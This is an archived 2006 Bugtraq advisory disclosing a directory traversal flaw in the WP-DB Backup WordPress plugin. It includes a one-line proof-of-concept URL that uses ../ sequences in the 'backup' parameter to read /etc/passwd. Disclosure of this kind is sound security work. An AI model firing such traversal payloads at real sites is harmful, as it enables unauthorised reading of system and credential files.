Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability
From: ss_team <ssteam.pl@xxxxxxxxx>
Date: Mon, 14 Aug 2006 10:36:03 +0200
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=JPMfGWS0emr0g52gCXm2GAG2IP6bX7yQnYSoGGU8cbuoGHGT5cLqPzSKApZJJKwMKWoowWPljCI5/MlNfn/Y9u8npUuhHo9IiOv/rW/nOYvaEmYyaiee1AqlrHUhCsV5zbHXSqMg11/mU/P4EMVfOkzyo7xGFnbR2ugMNcMiSw8=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi all,

Software: WP-DB Backup Plugin for Wordpress

Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/

Description:
WP-DB Backup is vulnerable to directory traversal attack.
You must have administrator rights in the wordpress blog to exploit
this vulnerability.

PoC:
http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup=../../../../../etc/passwd

Credits:
marc & shb from ssteam are credited with discoverying this vulnerability.

Vendor:
not contacted.

--
Coolest IT security blog: http://ssteam.ath.cx

Prev by Date: Kaspersky Anti-Hacker personal firewall unstealthy stealth mode
Next by Date: Arbitrary Library Loading in Informix
Previous by thread: Kaspersky Anti-Hacker personal firewall unstealthy stealth mode
Next by thread: Arbitrary Library Loading in Informix
Index(es):
- Date
- Thread